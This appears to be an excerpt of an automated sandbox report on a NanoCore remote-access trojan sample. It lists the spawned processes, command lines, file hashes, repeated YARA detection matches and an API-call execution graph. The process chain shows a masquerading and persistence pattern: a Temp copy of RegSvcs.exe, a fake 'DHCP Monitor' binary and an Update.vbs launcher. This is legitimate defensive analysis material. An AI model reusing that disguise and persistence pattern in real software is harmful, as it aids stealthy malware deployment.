              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

              Target ID:23
              Start time:17:52:23
              Start date:03/02/2023
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
              Imagebase:0xb80000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:24
              Start time:17:52:23
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:25
              Start time:17:52:28
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xa50000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:26
              Start time:17:52:33
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:27
              Start time:17:52:41
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:28
              Start time:17:52:44
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x950000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:29
              Start time:17:52:44
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:32
              Start time:17:52:55
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xf30000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:33
              Start time:17:52:56
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:34
              Start time:17:53:05
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:35
              Start time:17:53:06
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:36
              Start time:17:53:12
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x7b0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:37
              Start time:17:53:20
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xa0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET


                Execution Graph

                Execution Coverage:10%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:10.2%
                Total number of Nodes:1493
                Total number of Limit Nodes:46
25261->25268 25262 3eb314 ExpandEnvironmentStringsW 25274 3ec793 _wcslen _wcsrchr 25262->25274 25263->25274 25289 3ed78f 25263->25289 25265 3ed40a 25266 3e1fbb CompareStringW 25266->25268 25268->25263 25268->25266 25269 3eca67 SetWindowTextW 25269->25274 25272 3f3e3e 22 API calls 25272->25274 25274->25262 25274->25265 25274->25269 25274->25272 25275 3ec855 SetFileAttributesW 25274->25275 25280 3ecc31 GetDlgItem SetWindowTextW SendMessageW 25274->25280 25283 3ecc71 SendMessageW 25274->25283 25288 3e1fbb CompareStringW 25274->25288 25313 3ea64d GetCurrentDirectoryW 25274->25313 25315 3da5d1 6 API calls 25274->25315 25316 3da55a FindClose 25274->25316 25317 3eb48e 76 API calls 2 library calls 25274->25317 25277 3ec90f GetFileAttributesW 25275->25277 25287 3ec86f __cftof _wcslen 25275->25287 25277->25274 25279 3ec921 DeleteFileW 25277->25279 25279->25274 25281 3ec932 25279->25281 25280->25274 25282 3d4092 _swprintf 51 API calls 25281->25282 25284 3ec952 GetFileAttributesW 25282->25284 25283->25274 25284->25281 25285 3ec967 MoveFileW 25284->25285 25285->25274 25286 3ec97f MoveFileExW 25285->25286 25286->25274 25287->25274 25287->25277 25314 3db991 51 API calls 3 library calls 25287->25314 25288->25274 25292 3ed799 __cftof _wcslen 25289->25292 25290 3ed9e7 25290->25274 25291 3ed9c0 25291->25290 25297 3ed9de ShowWindow 25291->25297 25292->25290 25292->25291 25293 3ed8a5 25292->25293 25318 3e1fbb CompareStringW 25292->25318 25294 3da231 3 API calls 25293->25294 25296 3ed8ba 25294->25296 25298 3ed8d9 ShellExecuteExW 25296->25298 25319 3db6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25296->25319 25297->25290 25298->25290 25304 3ed8ec 25298->25304 25300 3ed8d1 25300->25298 25301 3ed925 25320 3edc3b 6 API calls 25301->25320 25302 3ed97b CloseHandle 25303 3ed989 25302->25303 25309 3ed994 25302->25309 25321 3e1fbb CompareStringW 25303->25321 25304->25301 25304->25302 25305 3ed91b ShowWindow 25304->25305 25305->25301 25308 3ed93d 25308->25302 25310 3ed950 
GetExitCodeProcess 25308->25310 25309->25291 25310->25302 25311 3ed963 25310->25311 25311->25302 25313->25274 25314->25287 25315->25274 25316->25274 25317->25274 25318->25293 25319->25300 25320->25308 25321->25309 25379 3ee455 14 API calls ___delayLoadHelper2@8 25381 3ea440 GdipCloneImage GdipAlloc 25382 3f3a40 5 API calls CatchGuardHandler 25428 3e1bbd GetCPInfo IsDBCSLeadByte 25429 3fb1b8 27 API calls 2 library calls 23449 3ef3b2 23450 3ef3be ___scrt_is_nonwritable_in_current_image 23449->23450 23481 3eeed7 23450->23481 23452 3ef3c5 23453 3ef518 23452->23453 23456 3ef3ef 23452->23456 23554 3ef838 4 API calls 2 library calls 23453->23554 23455 3ef51f 23547 3f7f58 23455->23547 23465 3ef42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23456->23465 23492 3f8aed 23456->23492 23463 3ef40e 23471 3ef48f 23465->23471 23550 3f7af4 38 API calls _abort 23465->23550 23467 3ef495 23501 3f8a3e 51 API calls 23467->23501 23470 3ef49d 23502 3edf1e 23470->23502 23500 3ef953 GetStartupInfoW __cftof 23471->23500 23475 3ef4b1 23475->23455 23476 3ef4b5 23475->23476 23477 3ef4be 23476->23477 23552 3f7efb 28 API calls _abort 23476->23552 23553 3ef048 12 API calls ___scrt_uninitialize_crt 23477->23553 23480 3ef4c6 23480->23463 23482 3eeee0 23481->23482 23556 3ef654 IsProcessorFeaturePresent 23482->23556 23484 3eeeec 23557 3f2a5e 23484->23557 23486 3eeef1 23487 3eeef5 23486->23487 23565 3f8977 23486->23565 23487->23452 23490 3eef0c 23490->23452 23493 3f8b04 23492->23493 23494 3efbbc CatchGuardHandler 5 API calls 23493->23494 23495 3ef408 23494->23495 23495->23463 23496 3f8a91 23495->23496 23498 3f8ac0 23496->23498 